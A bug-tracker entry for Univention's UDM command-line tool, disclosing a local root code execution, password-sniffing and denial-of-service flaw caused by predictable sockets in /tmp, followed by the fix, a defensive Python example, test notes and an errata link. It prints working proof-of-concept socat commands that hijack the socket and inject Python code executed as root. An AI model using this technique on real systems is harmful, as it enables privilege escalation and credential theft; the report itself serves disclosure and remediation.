Univention Bugzilla – Bug 40422
local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/
Last modified: 2021-06-23 07:29:10 CEST
As the UDM-CLI tool connects to UNIX sockets in /tmp/, everybody is able to "play" CLI-Server. For example, the user "nobody" may create that unix socket and just needs to wait for the Administrator (or a joinscript/postinst/whatever) to send requests to that socket. It allows a MITM attack, e.g. to sniff the password.

    nobody@master:~$ mkdir /tmp/admincli_0
    nobody@master:~$ socat unix-listen:/tmp/admincli_0/sock stdout
    ['/usr/sbin/udm', 'users/user', 'modify', '--dn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--set', 'password=foo', '--binddn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--bindpw', 'univention']

As the password is in the process list anyway, this is not more critical than a user having access to the system (e.g. due to Bug #39678 comment 7).
[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever.
And another thing is that code which is sent to the socket is executed, in both directions:

→ let user 'root' execute code (logged in as user nobody):

    # su nobody
    nobody:/$ mkdir /tmp/admincli_0
    nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin
    nobody:/$ ls -l /tmp/evaled
    -rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled

→ Execute code on the server (harmless, as the same user):

    printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock
* Code is now evaluated with ast.literal_eval().
* Sockets are checked to verify that their uid is the same as the current/calling UID. → Should we also check permissions here?
* If the connection fails, it is retried with a socket name containing random values to prevent someone from making UDM unusable for non-root users.

univention-directory-manager-modules (11.0.3-17):
r70594 | Bug #40422: fix local root code execution and MITM vulnerability
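The two client-side measures named in the fix, reconstructed as an added example that is not Univention's code: refuse a socket in a shared directory unless it is a real socket owned by the calling UID (the group/world-writable check on top of that is this example's own addition, prompted by the open permissions question), and decode the request with ast.literal_eval() so the payload from the report is rejected as data instead of being run. The socket path, the NUL-terminated list-of-strings request format and the demo() helper are assumptions.

```python
import ast
import os
import socket
import stat
import tempfile


def socket_is_safe(path, uid=None):
    """True only if path is a real UNIX socket owned by uid (default: caller).
    lstat() rejects a planted symlink; the mode check is this example's own."""
    uid = os.getuid() if uid is None else uid
    try:
        st = os.lstat(path)
    except OSError:
        return False
    if not stat.S_ISSOCK(st.st_mode) or st.st_uid != uid:
        return False  # not a socket, or created by another user (MITM)
    return not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)  # not hijackable


def parse_request(raw):
    """Decode a NUL-terminated request as data, never as code: literal_eval()
    accepts only literals, so "__import__('os').system(...)" raises ValueError."""
    text = raw.split(b"\x00", 1)[0].decode("utf-8")
    value = ast.literal_eval(text)  # ValueError on calls, names, attributes
    if not isinstance(value, list) or not all(isinstance(a, str) for a in value):
        raise ValueError("request must be a list of strings")
    return value


def demo():
    # Bind a socket in a private temp dir (assumed layout) and run both checks.
    tmp = tempfile.mkdtemp()
    path = os.path.join(tmp, "sock")
    old = os.umask(0o077)  # socket is created mode 0700
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)
    os.umask(old)
    results = {
        "own": socket_is_safe(path),
        "other_uid": socket_is_safe(path, uid=os.getuid() + 1),
        "argv": parse_request(b"['/usr/sbin/udm', 'users/user', 'list']\x00"),
    }
    try:
        parse_request(b"__import__('os').system('touch /tmp/evaled')\x00")
        results["code_rejected"] = False
    except ValueError:
        results["code_rejected"] = True
    srv.close()
    os.unlink(path)
    return results
```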
OK: r70594
OK: udm modules
OK: su -c '/usr/sbin/udm users/user' Administrator
OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s

FYI: A user visible progress would be nice as those 30s massively delay the CLI usage; bash-completion seems to be broken.

FIXED: univention-directory-manager-modules.yaml
r70667 | Bug #40422 et al: UDM YAML
OK: errata-announce -V --only univention-directory-manager-modules.yaml
(In reply to Philipp Hahn from comment #4)
> FYI: A user visible progress would be nice as those 30s massively delay the
> CLI usage ; bash-completion seems to be broken.

Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224.
*** Bug 37604 has been marked as a duplicate of this bug. ***
<http://errata.software-univention.de/ucs/4.1/208.html>